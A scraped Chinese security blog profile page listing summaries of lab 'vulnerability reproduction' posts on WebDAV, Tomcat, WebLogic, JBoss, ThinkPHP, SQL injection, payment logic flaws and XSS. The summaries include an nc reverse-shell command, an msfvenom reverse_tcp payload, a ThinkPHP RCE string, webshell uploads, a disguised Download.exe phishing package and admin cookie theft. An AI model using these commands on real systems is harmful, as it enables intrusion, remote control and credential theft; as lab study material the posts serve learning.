自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(32)
  • 收藏
  • 关注

原创 中间件 漏洞复现

本地搭建2003 server1.开启 WebDAV 和写权限:2.⽤burpsuite 提交OPTIONS 查看⽀持的协议3.⽤PUT上传⽂档,但不能直接上传⽅法脚本⽂档,可以先上传⼀个其他类型的⽂档,然后移动成 脚本⽂档(内容为asp的一句话木马)4.使⽤MOVE命令将其更名为脚本⽂档后缀5.用中国蚁剑连接。

2024-08-07 21:02:46 344

原创 linux使用nc(瑞士军刀)来反弹shell

2.查看kali的ip地址(为了知道监听的ip以及端口号)这里的监听ip端口号为 192.168.x.x 5555。3.打开nc64.exe文件夹并在文件夹内打开终端,并输入nc64.exe -v 监听的ip 端口号 -e cmd。1.打开kali,打开终端输入nc -lvvp 5555(5555为想监听的端口号)4.此时看我们的kali开启监听的地方发现已经获得物理机的shell。这里使用的攻击者为 kali 被攻击者为 自己的物理机。使用的软件为nc64.exe。

2024-08-07 16:36:44 625

原创 常见的框架漏洞----漏洞复现

后改为s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20"

2024-08-07 14:04:33 290

原创 Jboss 漏洞合集

1.打开环境访问漏洞地址 /jbossmq-httpil/HTTPServerILServlet。2.访问地址/invoker/JMXInvokerServlet自动下载如下文件。1.搭建环境并在url跟/invoker/readonly查看是否有漏洞。2.打开jboss反序列化软件 将网址放入 cmd内输入想执行的代码。2.使用jexboss.py获取shell。4.将反弹shell进⾏base64编码。2.点击jmx console。5.打开kali开始监听。1.搭建好环境 进入。

2024-08-06 18:15:05 203

原创 WebLogic 相关漏洞复现合集

2.默认账号密码:weblogic/Oracle@123 输入并登录。5.上传war包,jsp木马压缩成zip,修改后缀为war,上传。1.搭建环境进入,在url后加/console可以进入登录页面。7.上传完成后访问你植入的木马,没有报错证明注入成功。8.使用哥斯拉进行连接测试,测试成功。3.进入后点击部署--安装。

2024-08-06 11:33:37 145

原创 CVE-2020-1938 漏洞复现

3.右键在此文件夹打开终端,并且输入 python2 Tomcat-ROOT路径下文件包含(CVE-2020-1938) -p8009 -f 木马文件夹名 ip。2.打开kali下载cve2020-1938。1.搭建环境并且打开点击任何地方都不能输入。

2024-08-06 10:45:39 100

原创 CVE-2017-12615 漏洞复现

1.搭建环境进行抓包,将POST改为PUT并且在后面加上文件名 并在下方写上木马。2.放行后访问此文件夹,访问成功证明注入成功。

2024-08-06 10:29:19 198

原创 后台弱口令部署war包 漏洞复现

1.搭建好环境打开页面---点击右方的manager app 默认账号密码为tomcat。3.将你生成的jsp木马压缩为zip格式并将后缀名改为war。5.点击完后在后面加lkj.jsp,访问成功证明注入成功。4.提交此war压缩包然后在目录中点击。2.登录完成后滑到下面点击浏览。

2024-08-06 10:12:31 381

原创 未授权访问漏洞合集

今天我们来开一个新的坑,未授权访问漏洞,以后我会慢慢更新,大家可以持续跟进一下,谢谢大家!

2024-08-03 16:57:30 268

原创 PhPMyadmin-漏洞复现

前情提要:首先将我们的PHP版本设置在5.5以上。

2024-08-03 16:34:28 377

原创 DeDeCMS-漏洞复现

2.上传后访问你上传的一句话木马文件 我这里写的一句话木马为phpinfo,显示成功即可证明注入。4.点击生成--更新主页html,将htm后缀改成php并且生成静态,点击更新主页html。5.访问此页面,没有报错证明注入成功(由于没有回显,这里输入的POST传参)1.点击核心--文件式管理器 点击文件上传,将我们的一句话木马进行上传。2.进入后点击模板--默认模板管理,找到index.htm。3.点击右方的编辑进入后改成写入的一句话木马,然后点击保存。1.点击模板--广告管理--生成一个新广告。

2024-08-03 16:08:16 351

原创 WordPress--漏洞复现

3.将文件内容改为我们的一句话木马,点击更新文件。4.访问这个文件显示出phpinfo证明注入成功。1.搭建好环境进入后台登录界面登录管理员。2.进入后选择外观---编辑。

2024-08-03 15:46:29 200

原创 Pageadmin-漏洞复现(上传⽂件漏洞)

8.使用中国蚁剑将asp路径以及密码输入进去,测试连接,连接成功证明文件上传漏洞成功。3.打开哥斯拉 管理---生成 生成一个密码为pass的asp木马。5.点击功能菜单----上传文件 上传我们刚刚压缩好的zip文件。7.在地址栏中访问解压出来的asp文件,未报错证明木马注入成功。1.搭建环境启动登录管理员账户,在网址后加/admin。6.上传后点击zip后的解压,将压缩包内的文件解压出来。4.将asp木马压缩成zip格式以便一会上传。2.进入后点击工具---文件管理。

2024-08-03 15:11:36 120

原创 支付漏洞-niushop靶场

1.搭建好环境进入配置密码2.先注册一个用户3.选择一个喜欢的商品4.进入后开启抓包点击购买并进行抓包5.将购买数量改成-46.放行后提交订单发现实现了零元购

2024-08-02 18:33:59 221

原创 ⽀付漏洞-cmseasy靶场

4.将数量改为1后点击购买跳转到输入地址界面,发现可以更改商品数量,改为-1后仅提示请输入联系电话,证明数量没有被检测到。8.点击确定后,查看个人中心,原本为0的余额变成了999证明支付漏洞成功。5.点击填写练习方式后跳转页面将其余信息填写完毕,点击在线支付。3.进入后,我们先试着将商品数量改为-1,提示最低购买一个。1.搭建csmeasy靶场,启动环境进入,注册并登录用户。6.跳转页面后选择余额支付后点击购买。2.点击任意一款喜欢的商品。7.提示我们购买成功。

2024-08-02 16:02:47 237

原创 ⽀付漏洞-dami靶场

4.进入用户下单页面,看到数量为-1且小计为-6000,选择站内扣款点击提交订单。7.在选择任意商品提交订单,选择站内扣款,提示付款成功。3.点击任意商品,将数量改为-1,点击购买。2.启动环境,进入搭建的dami靶场。6.点击查看订单,看到数量为-1。

2024-08-02 15:51:12 520

原创 php反序列靶场serial

7.下载bak.zip里面有三个源代码,查看源代码可得知存在文件包含漏洞,可以构造payload加以利用输出一些我们想要的信息。3.使用物理机首先访问80端口,提示这里是新cookie进行程序测试,那我们查看cookie。9.将空格改为\x00,放到burp重放器里面发送。4.f12查看,是一段base64编码。6.进入backup子目录发现有压缩包。到这里思路突然断了,容up主思考一下。8.用base64解码得到字节序列。2.使用kali扫描nat端口。

2024-08-01 20:03:33 746

原创 Log4j2远程代码执行漏洞复现

3.浏览器访问搭建环境的IP加端口,出现以下界面证明搭建成功。1.环境搭建 docker-compose up -d。2.查看环境信息 docker-compose ps。肚子有点饥饿,下次更新吧。

2024-07-31 19:01:48 145

原创 Jangow-1.0.1 靶机教程

4.在这里输入一句话木马 echo '<?6.打开蚂剑直接连接成功,即可进入。2.逐个点击页面中可以点击的位置。1.扫描目标主机地址。3.输入id发现有回显。5.输入ls查看文件。

2024-07-31 18:16:59 179

原创 录音管理系统漏洞复现

3.将id改为ls及发现出现了漏洞,漏洞复现成功。并保留原本的host地址,并发送到重放器。1.找到一个网站输入并抓包。2.将抓包的内容替换成。

2024-07-31 17:53:42 135

原创 bugku-web

此文档为里web内容。

2024-07-30 18:05:59 124

原创 文件解析漏洞

2.在文件夹内创建1.txt,文本内写入你的一句话木马 作者写入的是 <%=now()%>(显示当前时间)2.在物理机访问此文件夹,分号可以起到隔断的效果,也就是说访问时会被服务器看成1.asp访问。6.在网址后访问图片马,并在后面加上/.php就会以php文件格式访问。4.进入hex里将刚刚加的两个空格的后面那个的16进制改成00然后放行。5.在目录后加/.php让浏览器以php文件格式访问,发现访问成功。5.访问刚刚的文件名并且在后面加%0A,即可访问成功。4.在网址中访问成功,证明图片马注入成功。

2024-07-30 17:34:00 422

原创 tomato靶机教程

这个文件,/var/ log / auth.log 这是一个文本文件,记录了所有和用户认证相关的 日志。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。是包含,如下图经过测试发现拥有文件包含漏洞,这里的测试是读取。作者有些许的饥饿,先下去吃个饭 下次一定更新,再见。访问刚刚扫描到的目录能找到info.php。先用御剑将ip进行查询 查询到靶机ip。在这个目录下面有一堆东西,然后看代码。使用kali查询ip后的目录。经过上面信息收集,我们发现。

2024-07-29 18:21:38 146

原创 AI-web-1.0靶机教程

有sql注入再进行--os-shell 即可获得shell权限(绝对路径在/m3diNf0/info.php下)用sqlmap -r -1.txt(导出的文件) 进行sql注入。首先访问robots.txt,发现有两个目录。找到ip后使用御剑进行ip目录进行扫描。将抓包后的值导出为txt并将1前加*将ip进行扫描,找出靶机ip地址。依次访问后面的目录发现有界面。在输入框内输入1发现有返回值。

2024-07-29 18:05:14 452

原创 hackme靶机 教程

植入成功后再网址中访问2.php 没有报错证明植入成功,打开蚁剑将网址进行绑定,密码为cmd,创建一个文件,成功证明获得shell权限。扫描ip以及目录找到首页注册登录,进行联合查询找到回显点,使用database()找到数据库名称。将上传的改成jpg格式的一句话木马抓包后将后缀名改回为php即可放行。根据列名user和password找出他的用户名密码。在网址中执行上传的1.php,证明上传成功。根据表名users找到表内的列名。再使用相同的方法将下面的木马植入。根据数据库名找到数据库内的表名。

2024-07-29 17:50:20 121

原创 xss flash钓鱼拿到主机控制权 教程

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7(改成自己虚拟机IP) LPORT=4444 -f exe > shell.exe。将两个⽂件⼀块压缩并更改⽂件名为"Download.exe"并且将压缩包命名为download.exe。标签卡点高级进入自解压选项将解压路径设置为--C:\Windows\Temp并且做如下设置。首先来到xss平台 点击公共模块---flash弹窗钓⻥-查看。生成shell.exe的文件。

2024-07-23 18:01:43 297 1

原创 xss平台获取管理员cookie 相关步骤

打开⼀个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输⼊进去。在我的项⽬中选择我们刚创建的项⽬点击右上角查看配置代码 进入复制script这一条。在以下网站注册账号并登录,点击创建项目并填写名称--立即提交。模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码。此时回到平台上可看到其劫持的Cookie信息。点击查看 可以查看到其中的cookie字段。

2024-07-23 17:50:23 198

原创 sql-labs 全关通关教程

根据给出的列名找出各列的名字以及密码(username和password中间使用~分隔开 以便分清)判断是否有sql注入,在后面跟一个',页面报sql语法错误证明有sql注入。将id=1改为-1并使用联合查询找出回显位置,这里显示2和3为回显位置。首先先搭建sql-labs靶场(不会的百度搜一下有教程)在2的回显位置上输入database()找出当前数据库名。当前先更新这么多,后面的内容下次更新,溜了~id=1查看页面是否有变化。输入--+页面回复正常证明闭合成功。在输入4时页面报错,证明有三列。

2024-07-22 17:56:59 304

原创 墨者学院-SQL手工注入漏洞测试(Db2数据库)教程

启动环境进入网页首先查看是否有sql注入。使用orderby查看有几列。根据表名和数据库名找出列名。使用联合查询找到回显位置。找出数据表内账户名密码。解密出密码登录找到答案。

2024-07-22 17:40:51 400

原创 墨者学院-SQL注入漏洞测试(POST)教程

现将网站进行抓包并在用户名进行sql注入判断。使用orderby判断有几列(有三列)使用联合查询直接可以得出答案。

2024-07-22 17:35:26 181

原创 墨者学院-SQL手工注入漏洞测试(MySQL数据库)教程

在地址栏输入 and 1=1--+判断是否有sql注入,当1=2时页面消失证明网页有SQL注入。使用联合查询将有回显的数值改为你要查看的数据库信息,下图找出了数据库名以及数据表名。使用order by判断有几列,当order by为5时页面消失,证明有4列。可以看出密码是md5加密过的,在网上找个解密就可以找到密码了。根据给出的name以及password查出数据表中的值。首先启动环境进入页面,点击下方公告。再使用数据表名查出表中各列的名。

2024-07-22 17:29:43 210

原创 墨者学院-SQL注入漏洞测试(登录绕过)

用户名地方使用or跳过登录(密码随便输)打开网站点击访问进入环境。

2024-07-22 11:45:10 193 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除